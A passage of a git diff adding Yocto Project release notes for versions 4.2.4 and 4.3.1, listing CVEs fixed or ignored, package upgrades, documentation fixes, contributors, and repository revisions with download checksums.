:cve:`2022-42721`, :cve:`2022-42722`, :cve:`2022-42895`, :cve:`2022-42896`, :cve:`2022-43750`, :cve:`2022-4378`, :cve:`2022-4379`, :cve:`2022-4382`, :cve:`2022-43945`, :cve:`2022-45869`, :cve:`2022-45886`, :cve:`2022-45887`, :cve:`2022-45919`, :cve:`2022-45934`, :cve:`2022-4662`, :cve:`2022-4696`, :cve:`2022-4744`, :cve:`2022-47518`, :cve:`2022-47519`, :cve:`2022-47520`, :cve:`2022-47521`, :cve:`2022-47929`, :cve:`2022-47938`, :cve:`2022-47939`, :cve:`2022-47940`, :cve:`2022-47941`, :cve:`2022-47942`, :cve:`2022-47943`, :cve:`2022-47946`, :cve:`2022-4842`, :cve:`2022-48423`, :cve:`2022-48424`, :cve:`2022-48425`, :cve:`2022-48502`, :cve:`2023-0030`, :cve:`2023-0045`, :cve:`2023-0047`, :cve:`2023-0122`, :cve:`2023-0160`, :cve:`2023-0179`, :cve:`2023-0210`, :cve:`2023-0240`, :cve:`2023-0266`, :cve:`2023-0386`, :cve:`2023-0394`, :cve:`2023-0458`, :cve:`2023-0459`, :cve:`2023-0461`, :cve:`2023-0468`, :cve:`2023-0469`, :cve:`2023-0590`, :cve:`2023-0615`, :cve_mitre:`2023-1032`, :cve:`2023-1073`, :cve:`2023-1074`, :cve:`2023-1076`, :cve:`2023-1077`, :cve:`2023-1078`, :cve:`2023-1079`, :cve:`2023-1095`, :cve:`2023-1118`, :cve:`2023-1192`, :cve:`2023-1194`, :cve:`2023-1195`, :cve:`2023-1206`, :cve:`2023-1249`, :cve:`2023-1252`, :cve:`2023-1281`, :cve:`2023-1295`, :cve:`2023-1380`, :cve:`2023-1382`, :cve:`2023-1390`, :cve:`2023-1513`, :cve:`2023-1582`, :cve:`2023-1583`, :cve:`2023-1611`, :cve:`2023-1637`, :cve:`2023-1652`, :cve:`2023-1670`, :cve:`2023-1829`, :cve:`2023-1838`, :cve:`2023-1855`, :cve:`2023-1859`, :cve:`2023-1872`, :cve:`2023-1989`, :cve:`2023-1990`, :cve:`2023-1998`, :cve:`2023-2002`, :cve:`2023-2006`, :cve:`2023-2007`, :cve:`2023-2008`, :cve:`2023-2019`, :cve:`2023-20569`, :cve:`2023-20588`, :cve:`2023-20593`, :cve:`2023-20928`, :cve:`2023-20938`, :cve:`2023-21102`, :cve:`2023-21106`, :cve:`2023-2124`, :cve:`2023-21255`, :cve:`2023-2156`, :cve:`2023-2162`, :cve:`2023-2163`, :cve:`2023-2166`, :cve:`2023-2177`, :cve:`2023-2194`, :cve:`2023-2235`, :cve:`2023-2236`, :cve:`2023-2248`, :cve:`2023-2269`, :cve:`2023-22995`, :cve:`2023-22996`, :cve:`2023-22997`, :cve:`2023-22998`, :cve:`2023-22999`, :cve:`2023-23000`, :cve:`2023-23001`, :cve:`2023-23002`, :cve:`2023-23003`, :cve:`2023-23004`, :cve:`2023-23006`, :cve:`2023-23454`, :cve:`2023-23455`, :cve:`2023-23559`, :cve:`2023-23586`, :cve:`2023-2430`, :cve:`2023-2483`, :cve:`2023-25012`, :cve:`2023-2513`, :cve:`2023-25775`, :cve:`2023-2598`, :cve:`2023-26544`, :cve:`2023-26545`, :cve:`2023-26605`, :cve:`2023-26606`, :cve:`2023-26607`, :cve:`2023-28327`, :cve:`2023-28328`, :cve:`2023-28410`, :cve:`2023-28464`, :cve:`2023-28466`, :cve:`2023-2860`, :cve:`2023-28772`, :cve:`2023-28866`, :cve:`2023-2898`, :cve:`2023-2985`, :cve:`2023-3006`, :cve:`2023-30456`, :cve:`2023-30772`, :cve:`2023-3090`, :cve:`2023-3106`, :cve:`2023-3111`, :cve:`2023-3117`, :cve:`2023-31248`, :cve:`2023-3141`, :cve:`2023-31436`, :cve:`2023-3159`, :cve:`2023-3161`, :cve:`2023-3212`, :cve:`2023-3220`, :cve:`2023-32233`, :cve:`2023-32247`, :cve:`2023-32248`, :cve:`2023-32250`, :cve:`2023-32252`, :cve:`2023-32254`, :cve:`2023-32257`, :cve:`2023-32258`, :cve:`2023-32269`, :cve:`2023-3268`, :cve:`2023-3269`, :cve:`2023-3312`, :cve:`2023-3317`, :cve:`2023-33203`, :cve:`2023-33250`, :cve:`2023-33288`, :cve:`2023-3338`, :cve:`2023-3355`, :cve:`2023-3357`, :cve:`2023-3358`, :cve:`2023-3359`, :cve:`2023-3389`, :cve:`2023-3390`, :cve:`2023-33951`, :cve:`2023-33952`, :cve:`2023-34255`, :cve:`2023-34256`, :cve:`2023-34319`, :cve:`2023-3439`, :cve:`2023-35001`, :cve:`2023-3567`, :cve:`2023-35788`, :cve:`2023-35823`, :cve:`2023-35824`, :cve:`2023-35826`, :cve:`2023-35828`, :cve:`2023-35829`, :cve:`2023-3609`, :cve:`2023-3610`, :cve:`2023-3611`, :cve:`2023-37453`, :cve:`2023-3772`, :cve:`2023-3773`, :cve:`2023-3776`, :cve:`2023-3777`, :cve:`2023-3812`, :cve:`2023-38409`, :cve:`2023-38426`, :cve:`2023-38427`, :cve:`2023-38428`, :cve:`2023-38429`, :cve:`2023-38430`, :cve:`2023-38431`, :cve:`2023-38432`, :cve:`2023-3863`, :cve_mitre:`2023-3865`, :cve_mitre:`2023-3866`, :cve_mitre:`2023-3867`, :cve:`2023-4004`, :cve:`2023-4015`, :cve:`2023-40283`, :cve:`2023-4128`, :cve:`2023-4132`, :cve:`2023-4147`, :cve:`2023-4155`, :cve:`2023-4194`, :cve:`2023-4206`, :cve:`2023-4207`, :cve:`2023-4208`, :cve:`2023-4273`, :cve:`2023-42752`, :cve:`2023-42753`, :cve:`2023-4385`, :cve:`2023-4387`, :cve:`2023-4389`, :cve:`2023-4394`, :cve:`2023-4459`, :cve:`2023-4569`, :cve:`2023-4611` and :cve:`2023-4623` +- nghttp2: Fix :cve:`2023-35945` +- openssl: Fix :cve:`2023-2975`, :cve:`2023-3446`, :cve:`2023-3817`, :cve:`2023-4807` and :cve:`2023-5363` +- pixman: Ignore :cve:`2023-37769` +- procps: Fix :cve:`2023-4016` +- python3-git: Fix :cve:`2023-40267`, :cve:`2023-40590` and :cve:`2023-41040` +- python3-pygments: Fix :cve:`2022-40896` +- python3-urllib3: Fix :cve:`2023-43804` and :cve:`2023-45803` +- python3: Fix :cve:`2023-24329` and :cve:`2023-40217` +- qemu: Fix :cve:`2023-3180`, :cve:`2023-3354` and :cve:`2023-42467` +- qemu: Ignore :cve:`2023-2680` +- screen: Fix :cve:`2023-24626` +- shadow: Fix :cve_mitre:`2023-4641` +- tiff: Fix :cve:`2023-40745` and :cve:`2023-41175` +- vim: Fix :cve:`2023-3896`, :cve:`2023-4733`, :cve:`2023-4734`, :cve:`2023-4735`, :cve:`2023-4736`, :cve:`2023-4738`, :cve:`2023-4750`, :cve:`2023-4752`, :cve:`2023-4781`, :cve:`2023-5441` and :cve:`2023-5535` +- webkitgtk: Fix :cve:`2023-32435` and :cve:`2023-32439` +- xserver-xorg: Fix :cve:`2023-5367` and :cve:`2023-5380` + + +Fixes in Yocto-4.2.4 +~~~~~~~~~~~~~~~~~~~~ + +- README: Update to point to new contributor guide +- README: fix mail address in git example command +- SECURITY.md: Add file +- avahi: handle invalid service types gracefully +- bind: upgrade to 9.18.19 +- bitbake.conf: add bunzip2 in :term:`HOSTTOOLS` +- bitbake: Fix disk space monitoring on cephfs +- bitbake: SECURITY.md: add file +- brief-yoctoprojectqs: use new CDN mirror for sstate +- bsp-guide: bsp.rst: replace reference to wiki +- bsp-guide: bsp: skip Intel machines no longer supported in Poky +- build-appliance-image: Update to mickledore head revision +- build-sysroots: Add :term:`SUMMARY` field +- build-sysroots: Ensure dependency chains are minimal +- build-sysroots: target or native sysroot population need to be selected explicitly +- buildtools-tarball: Add libacl +- busybox: Set PATH in syslog initscript +- busybox: remove coreutils dependency in busybox-ptest +- cmake.bbclass: fix allarch override syntax +- cml1: Fix KCONFIG_CONFIG_COMMAND not conveyed fully in do_menuconfig +- contributor-guide/style-guide: Add a note about task idempotence +- contributor-guide/style-guide: Refer to recipes, not packages +- contributor-guide: deprecate "Accepted" patch status +- contributor-guide: discourage marking patches as Inappropriate +- contributor-guide: recipe-style-guide: add Upstream-Status +- contributor-guide: recipe-style-guide: add more patch tagging examples +- contributor-guide: recipe-style-guide: add section about CVE patches +- contributor-guide: style-guide: discourage using Pending patch status +- core-image-ptest: Define a fallback for :term:`SUMMARY` field +- cve-check: add CVSS vector string to CVE database and reports +- cve-check: don't warn if a patch is remote +- cve-check: slightly more verbose warning when adding the same package twice +- cve-check: sort the package list in the JSON report +- cve-exclusion_6.1.inc: update for 6.1.57 +- dbus: add additional entries to :term:`CVE_PRODUCT` +- dbus: upgrade to 1.14.10 +- dev-manual: add security team processes +- dev-manual: disk-space: improve wording for obsolete sstate cache files +- dev-manual: disk-space: mention faster "find" command to trim sstate cache +- dev-manual: fix testimage usage instructions +- dev-manual: layers: Add notes about layer.conf +- dev-manual: licenses: mention :term:`SPDX` for license compliance +- dev-manual: new-recipe.rst fix inconsistency with contributor guide +- dev-manual: new-recipe.rst: add missing parenthesis to "Patching Code" section +- dev-manual: new-recipe.rst: replace reference to wiki +- dev-manual: remove unsupported :term: markup inside markup +- dev-manual: start.rst: remove obsolete reference +- ell: upgrade to 0.58 +- externalsrc: fix dependency chain issues +- ffmpeg: upgrade to 5.1.3 +- ffmpeg: avoid neon on unsupported machines +- file: fix call to localtime_r() +- file: upgrade to 5.45 +- fontcache.bbclass: avoid native recipes depending on target fontconfig +- gcc-crosssdk: ignore MULTILIB_VARIANTS in signature computation +- gcc-runtime: remove bashism +- gcc: backport a fix for ICE caused by CVE-2023-4039.patch +- gcc: depend on zstd +- gdb: fix :term:`RDEPENDS` for PACKAGECONFIG[tui] +- glib-2.0: libelf has a configure option now, specify it +- glibc: stable 2.37 branch updates +- gnupg: Fix reproducibility failure +- gnupg: upgrade to 2.4.3 +- go: upgrade to 1.20.7 +- graphene: fix runtime detection of IEEE754 behaviour +- gstreamer: upgrade to 1.22.6 +- gtk4: upgrade to 4.10.5 +- gzip: upgrade to 1.13 +- igt-gpu-tools: do not write shortened git commit hash into binaries +- inetutils: don't guess target paths +- inetutils: remove obsolete cruft from do_configure +- insane.bbclass: Count raw bytes in shebang-size +- kernel.bbclass: Add force flag to rm calls +- lib/package_manager: Improve repo artefact filtering +- libc-test: Run as non-root user +- libconvert-asn1-perl: upgrade to 0.34 +- libevent: fix patch Upstream-Status +- libgudev: explicitly disable tests and vapi +- librepo: upgrade to 1.15.2 +- librsvg: upgrade to 2.54.6 +- libsndfile1: upgrade to 1.2.2 +- libsoup-2.4: Only specify --cross-file when building for target +- libsoup-2.4: update :term:`PACKAGECONFIG` +- libx11: upgrade to 1.8.7 +- libxkbcommon: add :term:`CVE_PRODUCT` +- libxpm: upgrade to 3.5.17 +- linux-firmware: add firmware files for NXP BT chipsets +- linux-firmware: package Dragonboard 845c sensors DSP firmware +- linux-firmware: package audio topology for Lenovo X13s +- linux-firmware: upgrade to 20230804 +- linux-yocto/5.15: update to v5.15.133 +- linux-yocto/6.1: fix CONFIG_F2FS_IO_TRACE configuration warning +- linux-yocto/6.1: fix IRQ-80 warnings +- linux-yocto/6.1: fix uninitialized read in nohz_full/isolcpus setup +- linux-yocto/6.1: tiny: fix arm 32 boot +- linux-yocto/6.1: update to v6.1.57 +- linux-yocto: add script to generate kernel :term:`CVE_CHECK_IGNORE` entries +- linux-yocto: make sure the pahole-native available before do_kernel_configme +- linux/cve-exclusion: add generated CVE_CHECK_IGNOREs +- linux/generate-cve-exclusions: fix mishandling of boundary values +- linux/generate-cve-exclusions: print the generated time in UTC +- manuals: add new contributor guide +- manuals: correct "yocto-linux" by "linux-yocto" +- mdadm: Disable further tests due to intermittent failures +- mdadm: skip running 04update-uuid and 07revert-inplace testcases +- migration-guides: add release notes for 4.0.12 +- migration-guides: add release notes for 4.0.13 +- migration-guides: add release notes for 4.2.3 +- mpfr: upgrade to 4.2.1 +- multilib.conf: explicitly make MULTILIB_VARIANTS vardeps on MULTILIBS +- nativesdk-intercept: Fix bad intercept chgrp/chown logic +- nettle: avoid neon on unsupported machines +- oe-depends-dot: improve '-w' behavior +- oeqa dnf_runtime.py: fix HTTP server IP address and port +- oeqa selftest context.py: remove warning from missing meta-selftest +- oeqa selftest context.py: whitespace fix +- oeqa/concurrencytest: Remove invalid buffering option +- oeqa/selftest/context.py: check git command return values +- oeqa/selftest/wic: Improve assertTrue calls +- oeqa/selftest: Fix broken symlink removal handling +- oeqa/utils/gitarchive: Handle broken commit counts in results repo +- openssl: upgrade to 3.1.4 +- openssl: build and install manpages only if they are enabled +- openssl: ensure all ptest fails are caught +- openssl: parallelize tests +- overview: Add note about non-reproducibility side effects +- packages.bbclass: Correct the check for conflicts with renamed packages +- pango: explictly enable/disable libthai +- patch.py: use --absolute-git-dir instead of --show-toplevel to retrieve gitdir +- pixman: Remove duplication of license MIT +- pixman: avoid neon on unsupported machines +- poky.conf: bump version for 4.2.4 release +- profile-manual: aesthetic cleanups +- pseudo: Fix to work with glibc 2.38 +- ptest: report tests that were killed on timeout +- python3-git: upgrade to 3.1.37 +- python3-urllib3: update to v1.26.18 +- python3: upgrade to 3.11.5 +- qemu: fix "Bad FPU state detected" fault on qemu-system-i386 +- ref-manual: Fix :term:`PACKAGECONFIG` term and add an example +- ref-manual: Warn about :term:`COMPATIBLE_MACHINE` skipping native recipes +- ref-manual: point outdated link to the new location +- ref-manual: releases.svg: Scarthgap is now version 5.0 +- ref-manual: system-requirements: update supported distros +- ref-manual: variables: add :term:`RECIPE_SYSROOT` and :term:`RECIPE_SYSROOT_NATIVE` +- ref-manual: variables: add :term:`TOOLCHAIN_OPTIONS` variable +- ref-manual: variables: add example for :term:`SYSROOT_DIRS` variable +- ref-manual: variables: provide no-match example for :term:`COMPATIBLE_MACHINE` +- resulttool/report: Avoid divide by zero +- runqemu: check permissions of available render nodes as well as their presence +- screen: upgrade to 4.9.1 +- scripts/create-pull-request: update URLs to git repositories +- sdk-manual: appendix-obtain: improve and update descriptions +- sdk-manual: extensible.rst: fix multiple formatting issues +- shadow: fix patch Upstream-Status +- strace: parallelize ptest +- sudo: upgrade to 1.9.15p2 +- systemd-bootchart: musl fixes have been rejected upstream +- systemd: backport patch to fix warning in systemd-vconsole-setup +- tar: upgrade to 1.35 +- tcl: Add a way to skip ptests +- tcl: prevent installing another copy of tzdata +- template: fix typo in section header +- test-manual: reproducible-builds: stop mentioning LTO bug +- uboot-extlinux-config.bbclass: fix missed override syntax migration +- vim: upgrade to 9.0.2048 +- vim: update obsolete comment +- wayland-utils: add libdrm :term:`PACKAGECONFIG` +- weston-init: fix init code indentation +- weston-init: remove misleading comment about udev rule +- wic: bootimg-partition: Fix file name in debug message +- wic: fix wrong attempt to create file system in upartitioned regions +- wireless-regdb: upgrade to 2023.09.01 +- xz: upgrade to 5.4.4 +- yocto-uninative: Update to 4.2 for glibc 2.38 +- yocto-uninative: Update to 4.3 + + +Known Issues in Yocto-4.2.4 +~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +- N/A + + +Contributors to Yocto-4.2.4 +~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +- Alberto Planas +- Alexander Kanavin +- Alexis Lothoré +- Antoine Lubineau +- Anuj Mittal +- Archana Polampalli +- Arne Schwerdt +- BELHADJ SALEM Talel +- Benjamin Bara +- Bruce Ashfield +- Chen Qi +- Colin McAllister +- Daniel Semkowicz +- Dmitry Baryshkov +- Eilís 'pidge' Ní Fhlannagáin +- Emil Kronborg Andersen +- Etienne Cordonnier +- Jaeyoon Jung +- Jan Garcia +- Joe Slater +- Joshua Watt +- Julien Stephan +- Kai Kang +- Khem Raj +- Lee Chee Yang +- Markus Niebel +- Markus Volk +- Marta Rybczynska +- Martijn de Gouw +- Martin Jansa +- Michael Halstead +- Michael Opdenacker +- Mikko Rapeli +- Mingli Yu +- Narpat Mali +- Otavio Salvador +- Ovidiu Panait +- Peter Kjellerstedt +- Peter Marko +- Peter Suti +- Poonam Jadhav +- Quentin Schulz +- Richard Purdie +- Robert P. J. Day +- Roland Hieber +- Ross Burton +- Ryan Eatmon +- Sakib Sajal +- Samantha Jalabert +- Sanjana +- Sanjay Chitroda +- Sean Nyekjaer +- Siddharth Doshi +- Soumya Sambu +- Stefan Tauner +- Steve Sakoman +- Tan Wen Yan +- Tom Hochstein +- Trevor Gamblin +- Vijay Anusuri +- Wang Mingyu +- Xiangyu Chen +- Yash Shinde +- Yoann Congal +- Yogita Urade +- Yuta Hayama + + +Repositories / Downloads for Yocto-4.2.4 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +poky + +- Repository Location: :yocto_git:`/poky` +- Branch: :yocto_git:`mickledore </poky/log/?h=mickledore>` +- Tag: :yocto_git:`yocto-4.2.4 </poky/log/?h=yocto-4.2.4>` +- Git Revision: :yocto_git:`7235399a86b134e57d5eb783d7f1f57ca0439ae5 </poky/commit/?id=7235399a86b134e57d5eb783d7f1f57ca0439ae5>` +- Release Artefact: poky-7235399a86b134e57d5eb783d7f1f57ca0439ae5 +- sha: 3d56bb4232ab29ae18249529856f0e638c50c764fc495d6beb1ecd295fa5e5e3 +- Download Locations: + http://downloads.yoctoproject.org/releases/yocto/yocto-4.2.4/poky-7235399a86b134e57d5eb783d7f1f57ca0439ae5.tar.bz2 + http://mirrors.kernel.org/yocto/yocto/yocto-4.2.4/poky-7235399a86b134e57d5eb783d7f1f57ca0439ae5.tar.bz2 + +openembedded-core + +- Repository Location: :oe_git:`/openembedded-core` +- Branch: :oe_git:`mickledore </openembedded-core/log/?h=mickledore>` +- Tag: :oe_git:`yocto-4.2.4 </openembedded-core/log/?h=yocto-4.2.4>` +- Git Revision: :oe_git:`23b5141400b2c676c806df3308f023f7c04e34e0 </openembedded-core/commit/?id=23b5141400b2c676c806df3308f023f7c04e34e0>` +- Release Artefact: oecore-23b5141400b2c676c806df3308f023f7c04e34e0 +- sha: 152f4ee3cdd2e159f6bd34b01d517de44dfe670d35a5e3c84cc32ee7842d9741 +- Download Locations: + http://downloads.yoctoproject.org/releases/yocto/yocto-4.2.4/oecore-23b5141400b2c676c806df3308f023f7c04e34e0.tar.bz2 + http://mirrors.kernel.org/yocto/yocto/yocto-4.2.4/oecore-23b5141400b2c676c806df3308f023f7c04e34e0.tar.bz2 + +meta-mingw + +- Repository Location: :yocto_git:`/meta-mingw` +- Branch: :yocto_git:`mickledore </meta-mingw/log/?h=mickledore>` +- Tag: :yocto_git:`yocto-4.2.4 </meta-mingw/log/?h=yocto-4.2.4>` +- Git Revision: :yocto_git:`d87d4f00b9c6068fff03929a4b0f231a942d3873 </meta-mingw/commit/?id=d87d4f00b9c6068fff03929a4b0f231a942d3873>` +- Release Artefact: meta-mingw-d87d4f00b9c6068fff03929a4b0f231a942d3873 +- sha: 8036847cf5bf3da9db4bad13aac9080d559848679f0ae03694d55a576bcaf75f +- Download Locations: + http://downloads.yoctoproject.org/releases/yocto/yocto-4.2.4/meta-mingw-d87d4f00b9c6068fff03929a4b0f231a942d3873.tar.bz2 + http://mirrors.kernel.org/yocto/yocto/yocto-4.2.4/meta-mingw-d87d4f00b9c6068fff03929a4b0f231a942d3873.tar.bz2 + +bitbake + +- Repository Location: :oe_git:`/bitbake` +- Branch: :oe_git:`2.4 </bitbake/log/?h=2.4>` +- Tag: :oe_git:`yocto-4.2.4 </bitbake/log/?h=yocto-4.2.4>` +- Git Revision: :oe_git:`c7e094ec3beccef0bbbf67c100147c449d9c6836 </bitbake/commit/?id=c7e094ec3beccef0bbbf67c100147c449d9c6836>` +- Release Artefact: bitbake-c7e094ec3beccef0bbbf67c100147c449d9c6836 +- sha: 6a35a62bee3446cd0f9e0ec1de9b8f60fc396109075b37d7c4a1f2e6d63271c6 +- Download Locations: + http://downloads.yoctoproject.org/releases/yocto/yocto-4.2.4/bitbake-c7e094ec3beccef0bbbf67c100147c449d9c6836.tar.bz2 + http://mirrors.kernel.org/yocto/yocto/yocto-4.2.4/bitbake-c7e094ec3beccef0bbbf67c100147c449d9c6836.tar.bz2 + +yocto-docs + +- Repository Location: :yocto_git:`/yocto-docs` +- Branch: :yocto_git:`mickledore </yocto-docs/log/?h=mickledore>` +- Tag: :yocto_git:`yocto-4.2.4 </yocto-docs/log/?h=yocto-4.2.4>` +- Git Revision: :yocto_git:`91a29ca94314c87fd3dc68601cd4932bdfffde35 </yocto-docs/commit/?id=91a29ca94314c87fd3dc68601cd4932bdfffde35>` + diff --git a/poky/documentation/migration-guides/release-notes-4.3.1.rst b/poky/documentation/migration-guides/release-notes-4.3.1.rst new file mode 100644 index 0000000000..cea9c538a2 --- /dev/null +++ b/poky/documentation/migration-guides/release-notes-4.3.1.rst @@ -0,0 +1,237 @@ +.. SPDX-License-Identifier: CC-BY-SA-2.0-UK + +Release notes for Yocto-4.3.1 (Nanbield) +---------------------------------------- + +Security Fixes in Yocto-4.3.1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +- libsndfile1: Fix :cve:`2022-33065` +- libxml2: Ignore :cve:`2023-45322` +- linux-yocto/6.1: Ignore :cve:`2020-27418`, :cve:`2023-31085`, :cve_mitre:`2023-34324`, :cve:`2023-39189`, :cve:`2023-39192`, :cve:`2023-39193`, :cve:`2023-39194`, :cve:`2023-4244`, :cve:`2023-42754`, :cve:`2023-42756`, :cve:`2023-44466`, :cve:`2023-4563`, :cve:`2023-45862`, :cve:`2023-45863`, :cve:`2023-45871`, :cve:`2023-45898`, :cve:`2023-4732`, :cve:`2023-5158`, :cve:`2023-5197` and :cve:`2023-5345` +- linux-yocto/6.5: Ignore :cve:`2020-27418`, :cve:`2023-1193`, :cve:`2023-39191`, :cve:`2023-39194`, :cve:`2023-40791`, :cve:`2023-44466`, :cve:`2023-45862`, :cve:`2023-45863`, :cve:`2023-4610` and :cve:`2023-4732` +- openssl: Fix :cve:`2023-5363` +- pixman: Ignore :cve:`2023-37769` +- vim: Fix :cve:`2023-46246` +- zlib: Ignore :cve:`2023-45853` + + +Fixes in Yocto-4.3.1 +~~~~~~~~~~~~~~~~~~~~ + +- baremetal-helloworld: Pull in fix for race condition on x86-64 +- base: Ensure recipes using mercurial-native have certificates +- bb-matrix-plot.sh: Show underscores correctly in labels +- bin_package.bbclass: revert "Inhibit the default dependencies" +- bitbake: SECURITY.md: add file +- brief-yoctoprojectqs: use new CDN mirror for sstate +- bsp-guide: bsp.rst: update beaglebone example +- bsp-guide: bsp: skip Intel machines no longer supported in Poky +- build-appliance-image: Update to nanbield head revision +- contributor-guide: add patchtest section +- contributor-guide: clarify patchtest usage +- cve-check: don't warn if a patch is remote +- cve-check: slightly more verbose warning when adding the same package twice +- cve-check: sort the package list in the JSON report +- dev-manual: add security team processes +- dev-manual: extend the description of CVE patch preparation +- dev-manual: layers: Add notes about layer.conf +- dev-manual: new-recipe.rst: add missing parenthesis to "Patching Code" section +- dev-manual: start.rst: remove obsolete reference +- dev-manual: wic: update "wic list images" output +- docs: add support for nanbield (4.3) release +- documentation.conf: drop SERIAL_CONSOLES_CHECK +- ell: Upgrade to 0.59 +- glib-2.0: Remove unnecessary assignement +- goarch: Move Go architecture mapping to a library +- kernel-arch: drop CCACHE from :term:`KERNEL_STRIP` definition +- kernel.bbclass: Use strip utility used for kernel build in do_package +- layer.conf: Switch layer to nanbield series only +- libsdl2: upgrade to 2.28.4 +- linux-yocto: make sure the pahole-native available before do_kernel_configme +- llvm: Upgrade to 17.0.3 +- machine: drop obsolete SERIAL_CONSOLES_CHECK +- manuals: correct "yocto-linux" by "linux-yocto" +- manuals: improve description of :term:`CVE_STATUS` and :term:`CVE_STATUS_GROUPS` +- manuals: Remove references to apm in :term:`MACHINE_FEATURES` +- manuals: update linux-yocto append examples +- manuals: update list of supported machines +- migration-4.3: additional migration items +- migration-4.3: adjustments to existing text +- migration-4.3: remove some unnecessary items +- migration-guides: QEMU_USE_SLIRP variable removed +- migration-guides: add BitBake changes +- migration-guides: add debian 12 to newly supported distros +- migration-guides: add kernel notes +- migration-guides: add testing notes +- migration-guides: add utility notes +- migration-guides: edgerouter machine removed +- migration-guides: enabling :term:`SPDX` only for Poky, not a global default +- migration-guides: fix empty sections +- migration-guides: further updates for 4.3 +- migration-guides: further updates for release 4.3 +- migration-guides: git recipes reword +- migration-guides: mention CDN +- migration-guides: mention LLVM 17 +- migration-guides: mention runqemu change in serial port management +- migration-guides: packaging changes +- migration-guides: remove SERIAL_CONSOLES_CHECK +- migration-guides: remove non-notable change +- migration-guides: updates for 4.3 +- oeqa/selftest/debuginfod: improve selftest +- oeqa/selftest/devtool: abort if a local workspace already exist +- oeqa/ssh: Handle SSHCall timeout error code +- openssl: Upgrade to 3.1.4 +- overview-manual: concepts: Add Bitbake Tasks Map +- patchtest-send-results: add In-Reply-To +- patchtest-send-results: check max line length, simplify responses +- patchtest-send-results: fix sender parsing +- patchtest-send-results: improve subject line +- patchtest-send-results: send results to submitter +- patchtest/selftest: add XSKIP, update test files +- patchtest: disable merge test +- patchtest: fix lic_files_chksum test regex +- patchtest: make pylint tests compatible with 3.x +- patchtest: reduce checksum test output length +- patchtest: remove test for CVE tag in mbox +- patchtest: remove unused imports +- patchtest: rework license checksum tests +- patchtest: shorten test result outputs +- patchtest: simplify test directory structure +- patchtest: skip merge test if not targeting master +- patchtest: test regardless of mergeability +- perl: fix intermittent test failure +- poky.conf: bump version for 4.3.1 release +- profile-manual: aesthetic cleanups +- ref-manual: Add documentation for the unimplemented-ptest QA warning +- ref-manual: Fix :term:`PACKAGECONFIG` term and add an example +- ref-manual: Warn about :term:`COMPATIBLE_MACHINE` skipping native recipes +- ref-manual: add systemd-resolved to distro features +- ref-manual: classes: explain cml1 class name +- ref-manual: document :term:`KERNEL_LOCALVERSION` +- ref-manual: document :term:`KERNEL_STRIP` +- ref-manual: document :term:`MESON_TARGET` +- ref-manual: document cargo_c class +- ref-manual: remove semicolons from ``*PROCESS_COMMAND`` variables +- ref-manual: update :term:`SDK_NAME` variable documentation +- ref-manual: variables: add :term:`RECIPE_MAINTAINER` +- ref-manual: variables: add :term:`RECIPE_SYSROOT` and :term:`RECIPE_SYSROOT_NATIVE` +- ref-manual: variables: add :term:`TOOLCHAIN_OPTIONS` variable +- ref-manual: variables: add example for :term:`SYSROOT_DIRS` variable +- ref-manual: variables: document :term:`OEQA_REPRODUCIBLE_TEST_PACKAGE` +- ref-manual: variables: mention new CDN for :term:`SSTATE_MIRRORS` +- ref-manual: variables: provide no-match example for :term:`COMPATIBLE_MACHINE` +- ref-manual: variables: remove SERIAL_CONSOLES_CHECK +- release-notes-4.3: add CVEs, recipe upgrades, license changes, contributors +- release-notes-4.3: add Repositories / Downloads section +- release-notes-4.3: feature additions +- release-notes-4.3: fix some typos +- release-notes-4.3: move new classes to Rust section +- release-notes-4.3: remove the Distribution section +- release-notes-4.3: tweaks to existing text +- sdk-manual: appendix-obtain: improve and update descriptions +- test-manual: reproducible-builds: stop mentioning LTO bug +- vim: Improve locale handling +- vim: Upgrade to 9.0.2068 +- vim: use upstream generated .po files + + +Known Issues in Yocto-4.3.1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +- N/A + + +Contributors to Yocto-4.3.1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +- Alejandro Hernandez Samaniego +- Alex Stewart +- Archana Polampalli +- Arne Schwerdt +- BELHADJ SALEM Talel +- Dmitry Baryshkov +- Eero Aaltonen +- Joshua Watt +- Julien Stephan +- Jérémy Rosen +- Khem Raj +- Lee Chee Yang +- Marta Rybczynska +- Max Krummenacher +- Michael Halstead +- Michael Opdenacker +- Paul Eggleton +- Peter Kjellerstedt +- Peter Marko +- Quentin Schulz +- Richard Purdie +- Robert P. J. Day +- Ross Burton +- Rouven Czerwinski +- Steve Sakoman +- Trevor Gamblin +- Wang Mingyu +- William Lyu +- Xiangyu Chen +- luca fancellu + + +Repositories / Downloads for Yocto-4.3.1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +poky + +- Repository Location: :yocto_git:`/poky` +- Branch: :yocto_git:`nanbield </poky/log/?h=nanbield>` +- Tag: :yocto_git:`yocto-4.3.1 </poky/log/?h=yocto-4.3.1>` +- Git Revision: :yocto_git:`bf9f2f6f60387b3a7cd570919cef6c4570edcb82 </poky/commit/?id=bf9f2f6f60387b3a7cd570919cef6c4570edcb82>` +- Release Artefact: poky-bf9f2f6f60387b3a7cd570919cef6c4570edcb82 +- sha: 9b4351159d728fec2b63a50f1ac15edc412e2d726e9180a40afc06051fadb922 +- Download Locations: + http://downloads.yoctoproject.org/releases/yocto/yocto-4.3.1/poky-bf9f2f6f60387b3a7cd570919cef6c4570edcb82.tar.bz2 + http://mirrors.kernel.org/yocto/yocto/yocto-4.3.1/poky-bf9f2f6f60387b3a7cd570919cef6c4570edcb82.tar.bz2 + +openembedded-core + +- Repository Location: :oe_git:`/openembedded-core` +- Branch: :oe_git:`nanbield </openembedded-core/log/?h=nanbield>` +- Tag: :oe_git:`yocto-4.3.1 </openembedded-core/log/?h=yocto-4.3.1>` +- Git Revision: :oe_git:`cce77e8e79c860f4ef0ac4a86b9375bf87507360 </openembedded-core/commit/?id=cce77e8e79c860f4ef0ac4a86b9375bf87507360>` +- Release Artefact: oecore-cce77e8e79c860f4ef0ac4a86b9375bf87507360 +- sha: e6cde08e7c549f57a67d833a36cdb942648fba81558dc8b0e65332d2a2c023cc +- Download Locations: + http://downloads.yoctoproject.org/releases/yocto/yocto-4.3.1/oecore-cce77e8e79c860f4ef0ac4a86b9375bf87507360.tar.bz2 + 